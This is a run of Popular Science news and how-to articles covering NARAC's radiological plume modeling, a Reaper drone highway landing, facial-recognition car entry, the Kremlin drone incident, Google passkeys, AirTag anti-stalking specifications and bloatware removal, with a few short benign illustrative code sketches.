Today, NARAC uses high-resolution weather models from NOAA as well as forecast models it helped develop. Every day, the center brings in more than a terabyte of weather forecast model data. And those 3D topography maps they previously had to scramble to make are all taken care of. “We already have all the world’s terrain mapped out,” says Glascoe. 

NARAC also keeps up-to-date population information, including how the distribution of people in a city differs between day and night, and data on the buildings in cities, whose architecture changes airflow. That’s on top of land-use information, since whether an area is made up of plains or forest changes the analysis. All of that together helps scientists figure out what a given hazardous release will mean to actual people in actual locations around actual buildings.

Helping bring all those inputs together, NARAC scientists have also created ready-to-go models specific to different kinds of emergencies, such as nuclear power plant failures, dirty bomb detonations, plumes of biological badness, and actual nuclear weapons explosions. The goal is that as soon as something happens, the team can say, “Oh, it’s something like this,” and have something to start with.

Katie Lundquist, a scientist specializing in scientific computing and computational fluid dynamics, is NARAC’s modeling team lead. Her team helps develop the models that underlie NARAC’s analysis, and right now it is working to improve understanding of how debris would be distributed in the mushroom cloud after a nuclear detonation and how radioactive material would mix with the debris. She’s also working on general weather modeling and making sure the software is all up to snuff for next-generation exascale supercomputers. 

“The atmosphere is really complex,” Lundquist says. “It covers a lot of scales, from a global scale down to just tiny little eddies that might be between buildings in an area. And so it takes a lot of computing power.”

NARAC has also striven to improve its communications game. “The authorities make the decision, but in a crisis, you can’t just give them all the information you’ve generated technically,” Glascoe says. “You can’t give them all sorts of pretty images of a plume.” They want one or two pages telling them only what the potential impact is. “And what sort of guidelines might help their decision making of whether people should shelter, evacuate, that sort of thing,” says Glascoe. 

To that end, NARAC has made publicly available examples of its briefing products, outlining what an emergency manager could expect to see in its one to two pages about dirty bombs, nuclear detonations, nuclear power plant accidents, hazardous chemicals, and biological agents.

The sim of all fears

Recently, the team has been assisting with radioactive worries in Ukraine, where Russia has interfered with the running of nuclear power plants. It also previously kept an analytical eye on the 2020 fires in Chernobyl’s exclusion zone and the same year’s launch of the Mars Perseverance rover. The rover had a plutonium power source, and NARAC was on hand to simulate what would happen in the event of an explosive accident. Going farther back, the team mobilized for weeks on end during the partial meltdown of the Fukushima reactors in Japan in 2011. 

But one of the events Glascoe is most proud of happened in late 2017, when sensors in Europe started picking up rogue radioactivity. Across the continent, instruments designed to detect radioactive decay saw spikes indicating ruthenium-106, with more than 300 total detections. “We were activated to try and figure out, ‘Well, what’s going on? Where did this come from?’” says Glascoe.

As NARAC started its analysis, Glascoe remembered an internal research project involving the use of measurement data, atmospheric transport models, statistical methods, and machine learning that he thought might be helpful in tracing the radioactivity backward, rather than making the more standard forward prediction. “As the data comes in, the modeling gets adjusted to try and identify where likely sources are,” says Glascoe. 

Like the prototype that DOE had called up for use with Three Mile Island, this one wasn’t quite ready, but Glascoe called headquarters for permission anyway. “I said, ‘Hey, I know we haven’t really kicked the tires too much on this thing, except they did conclude this project and it looks like it works.’” They agreed to let him try it. 

Four days and many supercomputer cycles later, the team produced a map of probable release regions. The bull’s-eye was on a region with an industrial center. “And sure enough, a release from that location would do the trick,” says Glascoe. 

The suspect spot was in Russia, and many now believe the radioactivity came from the Mayak nuclear facility, which processes spent nuclear fuel. Mayak is located in a “closed city,” one that tightly controls who goes in and out. 
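A heavily simplified sketch can illustrate the backward-attribution idea: run a toy forward model from each candidate source and keep the candidate that best reproduces the sensor readings. The inverse-square “plume,” the sensor layout, and the readings below are all invented for illustration; NARAC’s real analysis uses full atmospheric transport models and far more sophisticated statistics:

```python
# Toy backward attribution: score a grid of candidate source locations by
# how well a crude dispersion model, run forward from each candidate,
# reproduces the sensor readings. Everything here is invented.

def predicted(src, sensor):
    """Toy forward model: concentration falls off as 1/distance^2."""
    dx, dy = sensor[0] - src[0], sensor[1] - src[1]
    return 1.0 / (dx * dx + dy * dy + 1e-9)

def score(src, readings):
    """Sum of squared errors after fitting the best source strength q."""
    preds = [predicted(src, s) for s, _ in readings]
    meas = [m for _, m in readings]
    q = sum(p * m for p, m in zip(preds, meas)) / sum(p * p for p in preds)
    return sum((q * p - m) ** 2 for p, m in zip(preds, meas))

# Sensor (x, y) positions and measured concentrations, generated here from
# a "true" source at (5, 5) with strength 100 under the same toy model.
readings = [((x, y), 100.0 * predicted((5, 5), (x, y)))
            for x, y in [(0, 0), (10, 0), (0, 10), (10, 10), (5, 9)]]

# Grid search: the candidate with the lowest misfit is the likely source.
candidates = [(x, y) for x in range(11) for y in range(11)]
best = min(candidates, key=lambda c: score(c, readings))
print(best)  # -> (5, 5)
```

Because the synthetic readings were generated from a source at (5, 5), the grid search recovers that location exactly; with real, noisy measurements the bull’s-eye would be a probability region rather than a single point.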

Ultimately, no one can stop the atmosphere’s churn, or its tendency to push particles around. The winds don’t care about borders or permits. And NARAC is there to scrutinize, even if it can’t stop, that movement.

Watch a giant military drone land on a Wyoming highway https://www.popsci.com/technology/reaper-drone-lands-highway-wyoming/ Tue, 09 May 2023 21:27:58 +0000 https://www.popsci.com/?p=540131
The Reaper on April 30.
The Reaper on April 30. Phil Speck / US Air National Guard

The MQ-9 Reaper boasts a wingspan of 66 feet and landed on Highway 287 on April 30. Here's why.

The post Watch a giant military drone land on a Wyoming highway appeared first on Popular Science.


On April 30, an MQ-9 Reaper drone landed on Highway 287, north of Rawlins, Wyoming. The landing was planned: it was part of Exercise Agile Chariot, which drew a range of aircraft and saw ground support provided by the Kentucky Air National Guard. While US aircraft have landed on highways before, this was the first time such a landing had been undertaken by a Reaper, and it demonstrates the continued viability of turning roads into runways as the need arises.

In a video showing the landing released by the Air Force, the Reaper’s slow approach is visible against the snow-streaked rolling hills and pale-blue sky of Wyoming in spring. The landing zone is inconspicuous, a stretch of highway that could be anywhere, except for the assembled crowds and vehicles marking this particular stretch of road as an impromptu staging ground for air operations. 

“The MQ-9 can now operate around the world via satellite launch and recovery without traditional launch and recovery landing sites and maintenance packages,” said Lt. Col. Brian Flanigan, 2nd Special Operations Squadron director of operations, in a release. “Agile Chariot showed once again the leash is off the MQ-9 as the mission transitions to global strategic competition.”

When Flanigan describes the Reaper as transitioning to “global strategic competition,” he is alluding to the comparatively narrow role Reapers played over the last 15 years, when they were used almost exclusively in the counter-insurgency wars the United States fought in Iraq and Afghanistan, as well as elsewhere, such as Somalia and Yemen. Reapers’ advantages shine in counter-insurgency: the drones can fly high for long stretches of time, watch the ground below in precise detail, detect small movements, and let their pilots pick targets as opportunities arise.

The Reaper on Highway 287 in Wyoming, before take-off.
The Reaper on Highway 287 in Wyoming, before take-off. Phil Speck / US Air National Guard

But Reapers have hard limits that make their future uncertain in wars against militaries with substantial anti-air weapons, to say nothing of flying against fighter jets. Reapers are slow, propeller-driven planes, built for endurance, not speed, and could be picked out of the sky or, worse, destroyed on a runway by a skilled enemy with dedicated anti-aircraft weaponry.

In March, a Reaper flying over the Black Sea was sprayed by fuel released from a Russian jet, an incident that led it to crash. While Wyoming’s Highway 287 is dangerous for cars, for planes it has the virtue of being entirely in friendly air space. 

Putting a Reaper into action in a war against a larger military, which in Pentagon terms often means against Russia or China, means finding a way to make the Reaper useful despite those threats. Such a mission would have to take advantage of the Reaper’s long endurance, surveillance tools, and precision-strike abilities, without leaving it overly vulnerable to attack. Operating from highways is one way to overcome that limit, letting the drone fly from wherever there is road.

“An adversary that may be able to deny use of a military base or an airfield, is going to have a nearly impossible time trying to defend every single linear mile of roads. It’s just too much territory for them to cover and that gives us access in places and areas that they can’t possibly defend,” Lt. Col. Dave Meyer, Deputy Mission Commander for Exercise Agile Chariot, said in a release.

Alongside the Reaper, the exercise showcased MC-130Js, A-10 Warthogs, and MH-6M Little Bird helicopters. With soldiers first establishing landing zones along the highway, the exercise then demonstrated landing the C-130 cargo aircraft to use as a refueling and resupply point for the A-10s, which also operated from the highway. Having the ability to not just land on an existing road, but bring more fuel and spare ammunition to launch new missions from the same road, makes it hard for an adversary to permanently ground planes, as resupply is also air-mobile and can use the same improvised runways.

Part of the exercise took place on Highway 789, which forks off 287 between Lander and Riverton, as the setting for trial search and rescue missions. “On the second day of operations, they repeated the procedure of preparing a landing zone for an MC-130. Once the aircraft landed, the team boarded MH-6 Little Birds that had been offloaded from the cargo plane by Soldiers from the 160th Special Operations Aviation Regiment. The special tactics troops then performed combat search-and-rescue missions to find simulated injured pilots and extract them from the landing zone on Highway 789,” described the Kentucky Air National Guard, in a statement.

With simulated casualties on cleared roads, the Air Force rehearsed for the tragedy of future war. As volunteers outfitted with prosthetic injuries were transported back to the care and safety of landed transports, the highways of Wyoming hosted the full spectrum of simulated war, waged from runways. Watch a video of the landing, below.

You can unlock this new EV with your face https://www.popsci.com/technology/genesis-gv60-facial-recognition/ Mon, 08 May 2023 22:00:00 +0000 https://www.popsci.com/?p=539829
If you've set up facial recognition on the Genesis GV60, you won't need to have your key on you.
If you've set up facial recognition on the Genesis GV60, you won't need to have your key on you. Kristin Shaw

We tested the Genesis GV60, which allows you to open and even start the car using facial recognition and a fingerprint.

The post You can unlock this new EV with your face appeared first on Popular Science.


If you have Face ID set up on your iPhone, you can unlock your device by showing it your visage instead of using a pin code or a thumb print. It’s a familiar aspect of smartphone tech for many of us, but what about using it to get in your vehicle?

The Genesis GV60 is the first car to use facial recognition to unlock and enter the vehicle, pairing it with your fingerprint to start it up.

How does it work? Here’s what we discovered.

The Genesis GV60 is a tech-laden EV

Officially announced in the fall of 2022, the GV60 is Genesis’ first dedicated all-electric vehicle. Genesis, for the uninitiated, is the luxury arm of Korea-based automaker Hyundai. 

Built on the new Electric-Global Modular Platform, the GV60 is equipped with two electric motors, and the result is an impressive ride. At the entry level, the GV60 Advanced gets 314 horsepower, and the higher-level Performance trim cranks out 429 horsepower. As a bonus, the Performance also includes a Boost button that can kick it up to 483 horsepower for 10 seconds; with that in play, the GV60 boasts a 0-to-60 mph time of less than four seconds.

The profile of this EV is handsome, especially in the look-at-me shade of São Paulo Lime. Inside, the EV is just as fetching as the exterior, with cool touches like the rotating gear shifter. As soon as the car starts up, a crystal orb rotates to reveal a notched shifter that looks and feels futuristic. Some might say it’s gimmicky, but it does have a wonderful ergonomic feel on the pads of the fingers.

The rotating gear selector.
The rotating gear selector. Kristin Shaw

Embedded in the glossy black trim of the B-pillar, which is the part of the frame between the front and rear doors, the facial recognition camera stands ready to let you into the car without a key. But first, you’ll need to set it up to recognize you and up to one other user, so the car can be accessed by a partner, family member, or friend. Genesis uses deep learning to power this feature, and if you’d like to learn more about artificial intelligence, read our explainer on AI.

The facial recognition setup process

You’ll need both sets of the vehicle’s smart keys (Genesis’ key fobs) in hand to set up Face Connect, Genesis’ moniker for its facial recognition setup. Place the keys in the car, start it up, and open the “setup” menu and choose “user profile.” From there, establish a password and choose “set facial recognition.” The car will prompt you to leave the car running and step out of it, leaving the door open. Gaze into the white circle until the animation stops and turns green, and the GV60 will play an audio prompt: “facial recognition set.” The system is intuitive, and I found that I could set it up the first time on my own just through the prompts. If you don’t get it right, the GV60 will let you know and the camera light will turn from white to red.

After capturing your image, the GV60 needs your fingerprint. You’ll go through largely the same setup process, this time choosing “fingerprint identification,” and the car will issue instructions. It will ask for several placements of your index finger on the sensor inside the vehicle (a small circle between the volume and tuning roller buttons) to create a full profile.

Genesis GV60 facial recognition camera
The camera on the exterior of the Genesis GV60. Genesis

In tandem, these two biometrics (facial recognition and fingerprint) work together to first unlock and then start the car. Upon approach, touch the door handle and place your face near the camera and it will unlock; you can even leave the key in the car and lock it with this setup. I found it to be very easy to set up, and it registered my face on the first try. The only thing I forgot the first couple of times was that I first had to touch the door handle and then scan my face. I could see this being a terrific way to park and take a jog around the park or hit the beach without having to worry about how to secure a physical key. 
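The sequencing described above, where a face scan unlocks the doors and a fingerprint then starts the car, can be sketched as a small state machine. This is purely an illustrative model; the class, method names, and flow details below are invented, not Genesis’ actual software.

```python
# Toy model of a two-step biometric flow: face unlocks, fingerprint starts.
# Names and logic are hypothetical, for illustration only.

class BiometricCarAccess:
    def __init__(self, enrolled_faces, enrolled_prints):
        self.enrolled_faces = set(enrolled_faces)    # GV60 supports up to two profiles
        self.enrolled_prints = set(enrolled_prints)
        self.unlocked = False
        self.started = False

    def touch_handle_and_scan_face(self, face):
        # Step 1: touching the door handle wakes the B-pillar camera,
        # and a recognized face unlocks the car.
        self.unlocked = face in self.enrolled_faces
        return self.unlocked

    def scan_fingerprint(self, fingerprint):
        # Step 2: the fingerprint reader starts the car, but only
        # once the face scan has already unlocked it.
        self.started = self.unlocked and fingerprint in self.enrolled_prints
        return self.started

car = BiometricCarAccess({"driver-face"}, {"driver-index-finger"})
car.scan_fingerprint("driver-index-finger")     # False: car still locked
car.touch_handle_and_scan_face("driver-face")   # True: doors unlock
car.scan_fingerprint("driver-index-finger")     # True: car starts
```

The point of ordering the two factors is that neither biometric alone is enough to drive away: a spoofed face only opens the door, and a fingerprint does nothing on a locked car.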

Interestingly, to delete a profile the car requires just one smart key instead of two.

Not everyone is a fan of this type of technology, given privacy concerns related to biometrics; Genesis says no biometric data is uploaded to the cloud, but is instead stored, heavily encrypted, in the vehicle itself. If it is your cup of tea and you like the option to leave the physical keys behind, this is a unique way of getting into your car. 

Stunt or sinister: The Kremlin drone incident, unpacked https://www.popsci.com/technology/kremlin-drone-incident-analysis/ Sat, 06 May 2023 11:00:00 +0000 https://www.popsci.com/?p=539413
Drones photo

There is a long history of drones being used in eye-catching and even dangerous ways.

The post Stunt or sinister: The Kremlin drone incident, unpacked appeared first on Popular Science.


Early in the morning of May 3, local Moscow time, a pair of explosions occurred above the Kremlin. Videos of the incident appeared to show two small drones detonating—ultramodern tech lit up against the venerable citadel. The incident was exclusively the domain of Russian social media for half a day, before Russian President Vladimir Putin declared it a failed assassination attempt.

What actually happened in the night sky above the Russian capital is still being pieced together, both in public and in secret. Open-source analysts, examining publicly available information, have constructed a picture of the event and the videos’ release, forming a good starting point.

Writing at Radio Liberty, a US-government-funded Russian-language outlet, reporters Sergei Dobrynin and Mark Krutov point out that a video showing smoke above the Kremlin was published around 3:30 am local time on a Moscow Telegram channel. Twelve hours later, Putin released a statement on the attack, and then, write Dobrynin and Krutov, “several other videos of the night attack appeared, according to which Radio Liberty established that two drones actually exploded in the area of the dome of the Senate Palace with an interval of about 16 minutes, arriving from opposite directions. The first caused a small fire on the roof of the building, the second exploded in the air.”

That the drones exploded outside a symbolic target, without reaching a practical one, could be by design, or it could owe to the nature of Kremlin air defense, which may have shot the drones down at the last moment before they became more threatening. 

Other investigations into the origin, nature, and means of the drone incident are likely being carried out behind the closed doors and covert channels of intelligence services. Without being privy to those conversations, and aware that information released by governments is only a selective portion of what is collected, it’s possible to instead answer a different set of questions: could drones do this? And why would someone use a drone for an attack like this?

To answer both, it is important to understand gimmick drones.

What’s a gimmick drone?

Drones, especially the models able to carry a small payload and fly long enough to travel a practical distance, can be useful tools for a variety of real functions. Those can include real-estate photography, crop surveying, creating videos, and even carrying small explosives in war. But drones can also carry less-useful payloads, and be used as a way to advertise something other than the drone itself, like coffee delivery, beer vending, or returning shirts from a dry cleaner. For a certain part of the 2010s, attaching a product to a drone video was a good way to get the media to write about it. 

What stands out about gimmick drones is not that they were doing something only a drone could do, but instead that the people behind the stunt were using a drone as a publicity technique for something else. In 2018, a commercial drone was allegedly used in an assassination attempt against Venezuelan president Nicolás Maduro, in which drones flew at Maduro and then exploded in the sky, away from people and without reports of injury. 

As I noted at the time about gimmick drones, “In every case, the drone is the entry point to a sales pitch about something else, a prelude to an ad for sunblock or holiday specials at a casual restaurant. The drone was always part of the theater, a robotic pitchman, an unmanned MC. What mattered was the spectacle, the hook, to get people to listen to whatever was said afterwards.”

Drones are a hard weapon to use for precision assassination. Compared to firearms, poisoning, explosives in cars or buildings, or a host of other attacks, drones represent a clumsy and difficult method. Wind can blow the drones off course, they can be intercepted before they get close, and the flight time of a commercial drone laden with explosives is in minutes, not hours.

What a drone can do, though, is explode in a high-profile manner.

Why fly explosive-laden drones at the Kremlin?

Without knowing the exact type of drone or the motives of the drone operator (or operators), it is hard to say exactly why one was flown at and blown up above one of Russia’s most iconic edifices of state power. Russia’s government initially blamed Ukraine, before moving on to attribute the attack to the United States. The United States denied involvement, and US Secretary of State Antony Blinken said to take any Russian claims with “a very large shaker of salt.”

Asked about the news, Ukraine’s President Volodymyr Zelensky said the country fights Russia on its own territory, not through direct attacks on Putin or Moscow. The war has seen successful attacks on Putin-aligned figures and war proponents in Russia, as well as on family members of Putin allies, though attribution for these attacks remains at least somewhat contested, with the United States attributing at least one of them to Ukrainian efforts.

Some war commentators in the US have floated the possibility that the attack was staged by Russia against Russia, as a way to rally support for the government’s invasion. However, that would demonstrate that Russian air defenses and security services are inept enough to miss two explosive-laden drones flying over the capital and would be an unusual way to argue that the country is powerful and strong. 

Ultimately, the drone attackers may have not conducted this operation to achieve any direct kill or material victory, but as a proof of concept, showing that such attacks are possible. It would also show that claims of inviolability of Russian airspace are, at least for small enough flying machines and covert enough operatives, a myth. 

In that sense, the May 3 drone incident has a lot in common with the May 1987 flight of Mathias Rust, an amateur pilot in Germany who safely flew a private plane into Moscow and landed it in Red Square, right near the Kremlin. Rust’s flight ended without bloodshed or explosions, and took place in a peacetime environment, but it demonstrated the hollowness of the fortress state whose skies he flew through.

Ditch your Google password and set up a passkey instead https://www.popsci.com/diy/google-passkey-setup/ Fri, 05 May 2023 16:00:00 +0000 https://www.popsci.com/?p=539294
Laptop with google account screen showing how to set up passkeys
Enable passkeys and you'll be glad you forgot your password. Austin Distel / Unsplash

The big G now provides a passwordless alternative to access your data.

The post Ditch your Google password and set up a passkey instead appeared first on Popular Science.


Password haters across the land—rejoice. Following the efforts of Apple and Microsoft, Google is now a step closer to being password-free after making passkeys available to all individual account users.

Of course, having the option doesn’t matter if you’re not sure what to do with it. Google’s new feature allows you to sign into your account from your devices with only a PIN or a biometric, like your face or fingerprint, so you can forget your ever-inconvenient password once and for all. If that sounds great to you, continue reading to activate passkeys for your Google account. 

How to set up a passkey for your Google account

Remember that at the moment, passkeys are only available for individual users, so you won’t find them on any Google Workspace account. To see what all the fuss is about, go to your Google Account page, look to the left-hand sidebar, and go to Security.

Under How to sign in to Google, click on Passkeys, and provide your password before you make any changes—this may be the last time you use it. On the next screen, you’ll notice a blue button that says Start with passkeys. Click on it and you’re done: Google will create the necessary passkeys and automatically save your private one to your device. The next time you log in, you’ll need to provide one of the authentication methods you’ve already set up for your computer or phone: your face, your fingerprint, or a personal identification number (PIN). 

[Related: How to secure your Google account]

If you have Android devices signed into your account, you’ll see them listed on the passkey menu as well. Google will automatically create those passkeys for you, so you’ll be able to seamlessly access your information on those devices. 

You can also use passkeys as backups to authenticate a login on another computer or smartphone. If you’re signing into your account on a borrowed laptop, for example, you can validate that new session by choosing your phone from the list that pops up when you choose passkeys as your authentication method. Then just follow the prompts on your phone, and you’ll be good to go. 

Now, a word of caution

In general, your Google passkey should work smoothly, but you may experience some hiccups as tech companies adapt to this relatively new form of security. Passkeys use a standard called WebAuthentication that creates a set of two related keys: one stays in the hands of the service you’re trying to log into (in this case, Google), while the other, a private one, is stored locally on your device. 

The dual nature of a passkey makes this sign-in method extremely secure because the service never sees your private key—it just needs to know you have it. But if you have multiple devices running different operating systems, the fact that your piece of the passkey puzzle lives locally can cause some issues.

Apple-exclusive environments have it easy. The Cupertino company syncs users’ passkeys using the iCloud keychain, so your private keys will all live simultaneously on your MacBook, iPhone, and iPad, as long as you’re signed into the same iCloud account. Add a Windows computer or an Android phone to the mix and things start to get messy—you may need to use a second device to verify your identity. This is when the backup devices mentioned above may come in handy. 

[Related: Keep your online accounts safe by logging out today]

The hope is that eventually, integration between operating systems will be complete and you’ll be able to log into all of your accounts no matter the make and OS of your device. In the meantime, you can try passkeys out and see if they’re right for you. Worst-case scenario, you set them aside and instead outsource the task of remembering your credentials to a password manager.

Google joins the fight against passwords by enabling passkeys https://www.popsci.com/technology/google-enables-passkeys/ Fri, 05 May 2023 14:00:42 +0000 https://www.popsci.com/?p=539269
Internet photo

It's still early days for passkeys, so expect some speed bumps if you want to be an early adopter.

The post Google joins the fight against passwords by enabling passkeys appeared first on Popular Science.


The passwordless future is slowly becoming a reality. This week, Google announced that you can now log into your Google account with just a passkey. It’s a huge milestone in what promises to be the incredibly long, awkward move away from using passwords for security. 

In case you haven’t heard yet, passwords are terrible. People pick awful passwords to begin with, find them really hard to remember, and then don’t even use them properly. When someone gets hacked, that may just involve someone using (or reusing) a really bad password or accidentally giving it to a scammer. To try to solve these difficult problems, an industry group—including Apple, Google, and Microsoft—called the FIDO Alliance developed a system called passkeys. 

Passkeys are built using what’s called the WebAuthentication (or WebAuthn) standard and public-key cryptography. It’s similar to how end-to-end encrypted messaging apps work. Instead of you creating a password, your device generates a unique pair of mathematically related keys. One of them, the public key, is stored by the service on its server. The other, the private key, is kept securely on your device, ideally locked behind your biometric data (like your fingerprint or face scan), though the system also supports PINs. 

[Related: Microsoft is letting you ditch passwords. Here’s how.]

Because the keys are mathematically related, the website or app can get your device to verify that you have the matching private key and issue a one-time login without ever actually knowing what your private key is. This means that account details can’t be stolen or phished and, since you don’t have to remember anything, logging in is simple. 
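The challenge-response idea above can be sketched end to end with textbook RSA using only the Python standard library. To be clear, this illustrates the math, not how passkeys are actually implemented: real WebAuthn credentials use vetted algorithms such as ECDSA over P-256 or Ed25519 with large keys, and the tiny primes below offer no real security.

```python
import hashlib
import secrets

# Toy RSA keypair built from two small, well-known primes.
# Real passkeys never use parameters anywhere near this small.
p, q = 999983, 1000003
n = p * q                    # public modulus
e = 65537                    # public exponent; (n, e) is the "public key"
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)          # private exponent: this is what stays on your device

def sign(challenge: bytes) -> int:
    """Device side: sign the server's challenge with the private key."""
    h = int.from_bytes(hashlib.sha256(challenge).digest(), "big") % n
    return pow(h, d, n)

def verify(challenge: bytes, signature: int) -> bool:
    """Server side: check the signature knowing only the public key (n, e)."""
    h = int.from_bytes(hashlib.sha256(challenge).digest(), "big") % n
    return pow(signature, e, n) == h

# Login flow: the server issues a fresh random challenge, the device signs it.
challenge = secrets.token_bytes(32)
assert verify(challenge, sign(challenge))
# A signature for one challenge doesn't validate another, so it can't be replayed.
assert not verify(secrets.token_bytes(32), sign(challenge))
```

The server stores only the public half, so even a full breach of its database yields nothing an attacker could use to log in, which is the core advantage over stored passwords.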

Take Google’s recent implementation. Once you’ve set up a passkey, you will be able to log into your Google account just by entering your email address and scanning your fingerprint or face. It feels similar to how built-in password managers work, though without any password in the mix. 

Of course, passkeys are still a work in progress, and implementations are inconsistent. As ArsTechnica points out, passkeys currently sync using your operating system ecosystem. Right now, if you exclusively use Apple devices, things are pretty okay. Your passkeys will sync between your iPhone, iPad, and Mac using iCloud. For everyone else though, they’re a mess. If you create a passkey on your Android smartphone, it will sync to your other Android devices, but not your Windows computer or even your Chrome browser. There are workarounds using tools like QR codes, but it’s a far cry from the easy password-sharing built into most browsers.

[Related: Apple’s passkeys could be better than passwords. Here’s how they’ll work.]

Also, passkeys aren’t very widely supported yet. Different operating systems support them to varying degrees, and there are currently just 41 apps and services that let you use them to log in. Google joining the list is a huge deal, in part because of how many services rely on Sign In With Google.

Password managers have become a good tool for managing complex, unique passwords across different devices and operating systems. These same password managers, like Dashlane and 1Password, are working to solve the syncing issues currently baked into passkeys. In a statement to PopSci, 1Password CEO Jeff Shiner said, “Passkeys are the first authentication method that removes human error—delivering security and ease of use… In order to be widely adopted though, users need the ability to choose where and when they want to use passkeys so they can easily switch between ecosystems… This is a tipping point for passkeys and making the online world safe.”

If you’re ready to try passkeys despite the sync issues and lack of support, you can read our guide on how to set up a passkey for your Google account right now. Unfortunately, this only works with regular Google accounts. Google Workspace accounts aren’t supported just yet. 

Tech giants have a plan to fight dangerous AirTag stalking https://www.popsci.com/technology/apple-google-airtag-tracker-stalking/ Thu, 04 May 2023 20:30:00 +0000 https://www.popsci.com/?p=539115
AirTags and other trackers like them use Bluetooth to help people find a lost item.
AirTags and other trackers like them use Bluetooth to help people find a lost item. Apple

A new proposal from Apple and Google could help solve a serious problem with Bluetooth trackers.

The post Tech giants have a plan to fight dangerous AirTag stalking appeared first on Popular Science.


Apple and Google have jointly proposed a new industry specification aimed at preventing the misuse of Bluetooth location-tracking devices like AirTags. The new proposal outlines a number of best practices for makers of Bluetooth trackers and, if adopted, would enable anyone with an iOS or Android smartphone to get a notification if they were the target of unauthorized tracking.

Since launching in 2021, Apple’s AirTags have been controversial. The coin-sized Bluetooth devices work using Apple’s Find My network, which is also used to track the location of iPhones, iPads, MacBooks, and other Apple devices. In essence, every Apple device works as a receiver and reports the location of any other nearby device back to Apple; this means that you can still track devices that don’t have GPS or even cellular data. Everything is end-to-end encrypted so only the authorized device owner can see where something is, but that hasn’t stopped AirTags being misused.

While a small location-tracking device with a long battery life that clips to your keys or fits in your bag has some very obvious benefits, they have also been called “a gift for stalkers.” If you can put an AirTag in your coat pocket or handbag, so can someone else. Similarly, it’s easy to find stories of abusive partners using AirTags to track their victims, or thieves using them to track valuable cars.

However, for all the negatives, a lot of people recognize that Bluetooth trackers can be incredibly useful. Just this week, the New York Police Department (NYPD) and Mayor Eric Adams announced that they were encouraging car-owning New Yorkers to leave an AirTag in their cars and said that they would be giving 500 away for free. “AirTags in your car will help us recover your vehicle if it’s stolen,” said NYPD Chief of Department Jeffrey Maddrey on Twitter. “Help us help you, get an AirTag.” 

Similarly, there are lots of stories of people using AirTags to get their lost (or stolen) luggage back, find dogs missing in storm drains, and, as the NYPD suggests, recover stolen cars.

The newly proposed industry specification represents a big step toward limiting the potential for abuse from AirTags and other location-tracking Bluetooth devices. At the moment, unwanted tracking notifications are an absolute mess. 

Already, iPhone users get a notification if their phone detects an unknown AirTag moving with them—which is likely why there are a lot more news stories of people finding AirTags than other Bluetooth location-tracking devices. They also get a notification when other trackers that support the Find My network, like eufy SmartTrack devices, are found nearby. However, to find Tile devices, iPhone users have to use an app to scan for them, something they’re only likely to do if they suspect they’re being tracked, or wait for the Tile device to beep after it’s been separated from its owner for three days. 

Things are worse for Android users. They have to use the Tracker Detect app to find nearby AirTags and other Find My compatible devices. They also have to use an app to scan for Tile trackers, or wait for them to beep.

If the new specifications are adopted, a Bluetooth location-tracking device that’s separated from its owner—and possibly being used to stalk someone—would automatically alert nearby users of any smartphone platform that they are possibly a target of unwanted tracking, and they would then be able to find and disable the tracker in question. There’d be no need for anyone to use an app to scan for trackers or wait to hear a beep.
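The alert logic described above boils down to a simple heuristic: flag any tracker that isn’t yours but keeps turning up near you over time. The sketch below is hypothetical; the thresholds, field names, and data shapes are invented for illustration, and the actual specification’s detection parameters are not described here.

```python
from dataclasses import dataclass

@dataclass
class Sighting:
    tracker_id: str   # advertised Bluetooth identifier of a nearby tracker
    minutes: int      # when it was seen, in minutes since scanning began

def unwanted_trackers(sightings, own_ids, min_span=30, min_sightings=3):
    """Return IDs of unfamiliar trackers observed repeatedly over a long window.

    Illustrative thresholds: at least `min_sightings` observations spread
    across at least `min_span` minutes. A phone's own paired tags never alert.
    """
    seen = {}
    for s in sightings:
        if s.tracker_id in own_ids:
            continue                                  # your own tag: ignore
        seen.setdefault(s.tracker_id, []).append(s.minutes)
    flagged = []
    for tracker_id, times in seen.items():
        if len(times) >= min_sightings and max(times) - min(times) >= min_span:
            flagged.append(tracker_id)                # likely traveling with you
    return flagged

log = [Sighting("tile-77", 0), Sighting("tag-42", 0),
       Sighting("tag-42", 20), Sighting("tag-42", 45)]
print(unwanted_trackers(log, own_ids={"tile-77"}))    # ['tag-42']
```

The time-window requirement is what separates a tag that merely passed by on the subway from one planted in your bag, which is why real-world alerts arrive after a delay rather than instantly.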

In a statement on Apple’s website, Ron Huang, Apple’s vice president of sensing and connectivity, says, “We built AirTag and the Find My network with a set of proactive features to discourage unwanted tracking—a first in the industry—and we continue to make improvements to help ensure the technology is being used as intended. This new industry specification builds upon the AirTag protections, and through collaboration with Google results in a critical step forward to help combat unwanted tracking across iOS and Android.”

And things look promising. Samsung, Tile, Chipolo, eufy Security, and Pebblebee, who all make similar tracking devices, have indicated their support for the promised specifications. There will now be a three-month comment period where interested parties can submit feedback. After that, Apple and Google will work together to implement unwanted tracking alerts into future iOS and Android releases. 

Make sure your computer isn’t downloading stuff you don’t want https://www.popsci.com/stop-laptop-installing-software/ Sun, 01 Aug 2021 11:00:00 +0000 https://www.popsci.com/uncategorized/stop-laptop-installing-software/
A person using a white MacBook laptop on a white table, maybe figuring out how to remove bloatware.
Take control over what gets installed on your laptop. Tyler Franta / Unsplash

Don't compromise the security of your system or the safety of your data.

The post Make sure your computer isn’t downloading stuff you don’t want appeared first on Popular Science.


The fewer applications you’ve got on your laptop or desktop, the better—it means more room for the apps you actually use, less strain on your computer, and fewer potential security holes to worry about.

Taking some time to remove bloatware—pre-installed programs you don’t want on your device—is only the first step. After that’s done, it’s important to ensure your computer doesn’t get cluttered up with unwanted software in the future. Once these two tasks are completed, you should find your cleaner, more lightweight operating system runs a whole lot smoother.

Banish the bloatware

A list of Windows 10 apps inside the operating system's apps and features menu, some of which may be bloatware.
Figuring out how to remove bloatware on Windows 10 is as easy as finding the program and clicking a button. David Nield for Popular Science

Your shiny new laptop might already be weighed down by unnecessary applications. These are called bloatware, and to expand on the brief definition we offered above, they’re basically the laptop manufacturer’s attempts to push its own services. Some can be useful, but you don’t have to keep them around if you don’t want to.

On Windows, click the Settings cog icon on the Start menu, then choose Apps. Next, click Installed apps (Windows 11) or Apps & features (Windows 10) to see a list of all the applications on your system. Removal is easy: on Windows 11, click the three dots to the right of an app’s name and pick Uninstall; on Windows 10, select the app and hit Uninstall. Most programs can be erased this way, though some built-in ones can’t be removed.

Bloatware is less of a problem on macOS devices, but you might not want to keep all of the programs Apple includes. You’ve got a few different options when it comes to uninstalling programs from macOS.

